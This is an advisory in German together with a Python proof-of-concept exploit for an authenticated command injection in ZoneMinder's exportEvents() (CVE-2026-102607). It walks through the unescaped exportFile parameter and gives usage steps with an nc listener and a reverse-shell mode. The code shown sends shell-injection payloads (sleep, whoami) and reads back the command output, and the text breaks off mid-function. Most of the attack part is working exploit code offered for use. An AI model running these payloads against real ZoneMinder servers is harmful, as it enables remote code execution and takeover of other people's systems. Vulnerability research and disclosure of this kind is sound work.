Python-PoC, das CVE-2026-102607 ausnutzt, eine authentifizierte OS-Befehlsinjektion in ZoneMinder <= 1.38.1 exportEvents(), die RCE, Exfiltration von Befehlsausgaben und Reverse Shells ermöglicht.
In der Ereignis-Exportfunktion von ZoneMinder existiert eine authentifizierte OS Command Injection-Schwachstelle. Der HTTP-Anfrageparameter exportFile wird ungefiltert an einen Shell-Befehl übergeben, der über PHPs exec() ausgeführt wird, wodurch jeder authentifizierte Benutzer mit der Berechtigung View Events beliebige Betriebssystembefehle auf dem Server ausführen kann.
Diese Schwachstelle ermöglicht vollständige Remote Code Execution (RCE) als Webserver-Benutzer (www-data).
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:Hweb/ajax/event.php, Zeile 103exportEvents() in web/skins/classic/includes/export_functions.php, Zeilen 1030–1032Die Funktion exportEvents() akzeptiert einen Parameter $export_root, der direkt aus $_REQUEST['exportFile'] stammt (über ajax/event.php, Zeile 103). Dieser Parameter wird verwendet, um den Verzeichnispfad zu konstruieren, der an die Befehle tar und zip angehängt wird.
Während der Archivdateipfad ($archive_path) in Zeile 1020 ordnungsgemäß mit escapeshellarg() maskiert wird, wird das nachfolgende Verzeichnisargument in Zeile 1030 direkt ohne jegliche Bereinigung in den Befehlsstring eingefügt:
// Line 1020 — properly escaped ✓
$command .= ' --file='.escapeshellarg($archive_path);
// Line 1030 — NOT escaped ✗ (VULNERABLE)
$command .= ' '.$export_root.($connkey?'_'.$connkey:'').'/';
// Line 1032 — executed
exec($command, $output, $status);
Ein Angreifer kann Shell-Metazeichen (;, |, &&, etc.) in den Parameter exportFile einschleusen, um aus dem beabsichtigten tar/zip-Befehl auszubrechen und beliebige Befehle auszuführen. Der von PHP angehängte abschließende / kann mit # (Shell-Kommentarzeichen) neutralisiert werden.
HTTP Request: $_REQUEST['exportFile']
│
▼
ajax/event.php (line 103)
└── exportEvents(..., $_REQUEST['exportFile'])
│
▼
export_functions.php (line 890)
└── $export_root = $_REQUEST['exportFile'] // No sanitization
│
▼
export_functions.php (line 1030)
└── $command .= ' ' . $export_root . '/' // Direct concatenation
│
▼
export_functions.php (line 1032)
└── exec($command) // OS Command Execution
View Events oder View Snapshots.__csrf_magic-Token muss enthalten sein (von einer beliebigen ZoneMinder-Seite abrufbar).exportDetail=1: Dieser Parameter muss in der Anfrage enthalten sein, um einen PHP-Fatal-Error in exportEventImagesMaster() bei Verwendung nicht existierender Event-IDs zu verhindern.#!/usr/bin/env python3
"""
=====================================================================
Affected Version : ZoneMinder <= 1.38.1
Tested On : ZoneMinder 1.38.1 (Docker)
Vulnerability : OS Command Injection in exportEvents()
CVSS Score : 9.9 (Critical)
Attack Vector : Network (Authenticated)
File : web/skins/classic/includes/export_functions.php
Sink : exec() at line 1032
Description:
The exportEvents() function in ZoneMinder constructs shell commands
for `tar` and `zip` archival using unsanitized user input from the
`exportFile` HTTP request parameter. This parameter is used as the
`$export_root` variable, which is directly concatenated into the
command string passed to exec() without escapeshellarg() or any
equivalent sanitization.
An authenticated attacker with "View Events" permission can inject
arbitrary OS commands by appending shell metacharacters (;) to the
`exportFile` parameter, achieving Remote Code Execution as the
web server user (www-data).
Usage:
1. Start a listener on your attack machine:
$ nc -lvnp <LPORT>
2. Run this exploit:
$ python3 poc.py --target http://<TARGET>/zm --lhost <LHOST> --lport <LPORT>
3. The exploit supports three modes:
--mode check : Verify the vulnerability (sleep-based timing)
--mode whoami : Extract the output of `whoami`
--mode revshell: Spawn a reverse shell to LHOST:LPORT
Author : d4kw1n
Date : 2026-03-10
"""
import argparse
import re
import sys
import time
import urllib.parse
try:
import requests
except ImportError:
print("[-] 'requests' library required. Install with: pip install requests")
sys.exit(1)
BANNER = r"""
ZoneMinder - Authenticated RCE via exportEvents() Command Injection - d4kw1n
"""
class ZMExploit:
def __init__(self, target, lhost=None, lport=None, session_cookie=None):
self.target = target.rstrip("/")
self.lhost = lhost
self.lport = lport
self.session = requests.Session()
self.session.verify = False
if session_cookie:
self.session.cookies.set("ZMSESSID", session_cookie)
def get_csrf_token(self):
"""Fetch a valid CSRF token from the target."""
res = self.session.get(f"{self.target}/index.php", timeout=10)
match = re.search(r'var csrfMagicToken = "(.*?)";', res.text)
if not match:
print("[-] Failed to extract CSRF token. Is the target reachable?")
return None
return match.group(1)
def send_payload(self, payload):
"""Send the injection payload via the export action."""
csrf = self.get_csrf_token()
if not csrf:
return None
data = {
"view": "request",
"request": "event",
"action": "export",
"exportFormat": "tar",
"exportDetail": "1",
"eids[]": "1",
"exportFile": payload,
"__csrf_magic": csrf,
}
try:
return self.session.post(
f"{self.target}/index.php", data=data, timeout=30
)
except requests.exceptions.ReadTimeout:
return None
def read_output(self, filename):
"""Read exfiltrated command output via archive.php."""
res = self.session.get(
f"{self.target}/index.php?view=archive&type=tar&file={filename}",
timeout=10,
)
return res.text.strip()
# ── Mode: check ──────────────────────────────────────────────
def check(self):
"""Verify the vulnerability using a timing-based approach."""
delay = 5
print(f"[*] Sending sleep {delay} payload for timing verification...")
payload = f"a; sleep {delay}; #"
start = time.time()
self.send_payload(payload)
elapsed = time.time() - start
print(f"[*] Response time: {elapsed:.2f}s (expected >= {delay}s)")
if elapsed >= delay:
print("[+] VULNERABLE - Command injection confirmed!")
return True
else:
print("[-] NOT VULNERABLE or target unreachable.")
return False
# ── Mode: whoami ─────────────────────────────────────────────
def whoami(self):
"""Extract the web server user via command output exfiltration."""
outfile = "whoami.tar"
print(f"[*] Injecting: whoami > {outfile}")
self.send_payload(f"a; whoami > {outfile}; #")
result = self.read_output(outfile)